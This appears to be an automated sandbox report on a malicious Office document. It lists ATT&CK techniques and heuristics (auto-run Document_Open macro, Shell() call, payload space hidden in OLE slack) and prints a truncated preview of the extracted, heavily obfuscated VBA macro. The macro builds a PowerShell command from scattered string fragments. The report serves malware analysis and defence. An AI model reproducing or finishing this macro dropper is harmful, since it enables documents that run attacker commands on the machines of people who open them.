Verdict: MALICIOUS (Risk Score 162)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is an OLE document with a high-severity heuristic indicating the presence of VBA macros. A critical heuristic confirms a Shell() call within the VBA code, and the Document_open macro is present. This suggests the macro is designed to execute arbitrary commands upon opening the document, likely to download and execute a secondary payload. The embedded URL is benign.
Heuristics (5)
- VBA macros detected (medium, 2 related findings), OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical), OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro (high), OLE_VBA_DOCOPEN: Document_Open macro
- OLE document has large unaccounted-for region (high), OLE_SLACK_ANOMALY: OLE file is 289,351 bytes but its declared streams total only 167,919 bytes; 121,432 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Embedded URL (info), EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41826 bytes |

SHA-256: 0314550ba6f0badfac54dcb25304b6afc4e15526de706e784ab44a3bb53af4d5

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "wvzPYDcwzv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
PVmEw = SuSWK - pFFBwH + 47206 - pXbAO / 27780 + JwzhY / 1431 + AcBPSb / 32209 - qcSKk + 99407 / GkCCR + sulphk + wUpmr
wKmIGO = kccizB - ftWvwP + 41311 - iDBwPJ / 64630 + WDpRW / 8627 + zfacR / 76842 - lGjszo + 25607 / wnTOf + HIzcCZ + bHjKb
BzHpcT = tAlAzH - VXfLB + 94891 - mcLctO / 36422 + RIFwB / 19786 + ZmJsRk / 28010 - kwrwW + 71001 / CrBDO + vMjFd + jcuAFN
njSiu = GBNFLG - vDlDP + 41759 - HKQIz / 93943 + jJEGzN / 22269 + Clwat / 71150 - RQXzz + 74299 / nhbmL + dPJkz + WsIwOs
RzNiUOaw = Application.Run("kLGRoEXzdsTn", "" + zjpzFdhwiEi + rMiVjDIiPZkqI + mFYSaMtrfV + wozjr + wUfOiGzSwtv + rENSZVbD + XwUOsAb + FlvMazb + nwvvAPGvWY + kmIacLbw + PNjvmiVzSS + dJVGNXVCfE + RwUfnGObA + rkmkFq + VXCiIjLv + BIfzYEbiBPwXz + wwvQiZano)
upzmln = aBiWGq - Thhpj + 25916 - WhEHSS / 36618 + bVrwt / 19894 + jPiIkX / 9321 - asEzLr + 85359 / HltXIt + SVUGZN + IzIjAS
End Sub
Attribute VB_Name = "dNSBdPNUHb"
Function mFYSaMtrfV()
On Error Resume Next
KBOPa = 94770 * GaKNq - bBQzw / ZJUCoh + jwPiQG - tGnqI + jfMNI - 47855
ELdBUj = 70870 - qwahl / (QqstH * fUOaoZ + (33048 * wHtPwp * 60170 * mjvZQp))
vFiUTMEVrA = "" + akSPWUPRw + zDNuPrGiFKlw + "pOW" + EMzhYpDaKNp + amizAUvnjTB + "Er" + jijFpokkRI + XffXtzFRMjva + "sH" + cmrVtwXwGVqE + NuIiMNc + "ElL" + QpTvsMCmI + LzswPVM + " " + KjobEDSXRO + nWbfZAfm + Chr(34) + " \" + Chr(34)
iNTpPB = 23969 * rAEOF / 69420 - rroui * 40600 + rwXbRQ + 79261 / jmVaz / 52240 / OnRLB
DYQrih = 16266 * sZOoWX / 34674 - kvaVUR * 86424 + makdBd + 36350 / WrswK / 50693 / HMpuwM
niufRK = "" + wwjPbBfmjlED + pOGuSifTiJJ + "$( " + iXwSdVzh + DsUMGSZViJhAfq + "Se"
aFdUXG = 15451 * AOjSbi / 95750 - nSDCzS * 47772 + EoaJb + 57796 / FBnuuE / 64412 / wkcLr
uzLkN = 24877 * PsIjcP / 67344 - wQWXiR * 77095 + DtFtGS + 40530 / hRwtb / 95574 / QiSmum
hYPbrJkSX = "" + qRlLoUEpG + qHThzXAw + "t " + pEAZGsLit + RoDojJTNMInPp + "'oFs" + LloWlPQz + lmibtKMKT + "' '" + QsROhlwICo + zjaqXPZAoC + "')" + XklTwaFVbpvsXI + SrwYZNlvTUp + " \" + YfNRVrwziKbjqz + hSOLvhwDCVJz + Chr(34) + " "
dlKbD = 19073 * bBRHdo / 63189 - oiQdJ * 72314 + ajwqi + 18586 / AhwJi / 62432 / ZPuzEG
khFhiS = "" + RtQhNnt + ObKbdMbXMBjK + Chr(43) + " [S" + AjPTVfFf + ijwScAMnacP + "TRIn" + wlhWjtONtzj + wTXqbjp + "g](" + wPIvLowjruvARh + YlXOliNC + "'36" + tPjAjPw + RNliZRJGpUAhl + "{78r"
CzRSLO = 4953 * TIvjA / 82401 - jCPtX * 91458 + DwzbcX + 67001 / VIjCzi / 96032 / qaOIRZ
KGokla = 72824 * kLWvGb / 88084 - DwtQw * 16627 + YhcNk + 43135 / hKsDLR / 58175 / CurDC
JPbozS = 84839 * lPuSV / 69213 - iWrnmA * 96032 + fiWYSI + 75885 / dUMRN / 93833 / dDQUQi
XMEBFN = "" + oCJqRSp + BoPCJNBUEiLD + "70" + cviwwZUjM + nKafNPVVWKc + "x80s" + thqIXbfzlm + mVqzMVbiVVCapr + "61r" + ijFzjIDRiLJlC + YtjbtfX + "110" + BjzXiPTjMpPEj + dSYOALpfn + ">1" + jFQVLKXQzAI + TsdZNTwrMUzaG + "01s1" + cLAMDziN + dFhQjOVmlvIiQ + "19" + XnUkSuEBOo + wcnkiNijNPbcFb + "G45~" + NAuvisfMOc + YDTczPYJwKiVij + "111G"
MrfqG = 70291 * NuqRDz / 51392 - BQlKK * 91283 + fqDiVC + 43646 / NzmXA / 43362 / GqoQGi
PssLYK = "" + MXocFwYvMN + ncOkqVdSRaazD + "98" + WupRXshRzOtTQa + nJISNZfP + "G10" + fEmzoZvACBX + wGKRWwCMraPnp + "6~10" + hwOZEtNdfAZUX + omrUMMDIJT + "1>9" + ndWKwiDSF + rvjciQwcivTldw + "9l" + fioFFubZAIqa + zSBnzZdjYr + "116>" + fWUrtOdwYoRis + JcVaVmKwAk + "32l7" + vFvFwsOPEEIPcz + IBTvCFTHCRrEUX + "8>" + ERirciVp + PEUGwYsPpzRu + "10"
dHVwiD = 13345 * BmsPWc / 97470 - ptdjEh * 45943 + jiOJUm + 62806 / tTMhc / 73262 / qNIdX
pvPSn = 55732 * AXBFM / 64844 - pzQLBm * 44826 + ftqozi + 14968 / UBiJWJ / 34167 / Chzqh
loCfAK = 90456 * lBLKOC / 37590 - jdRVpO * 75502 + STMFhU + 80225 / YrFnj / 80626 / TmhTSu
vlZcoRz = "" + ZDBKzEFWwjtPzo + OFcVCPQDDT + "1r11" + vDAwmmpGS + LozQwjWZBQiO + "6s46"
mFYSa
... (truncated)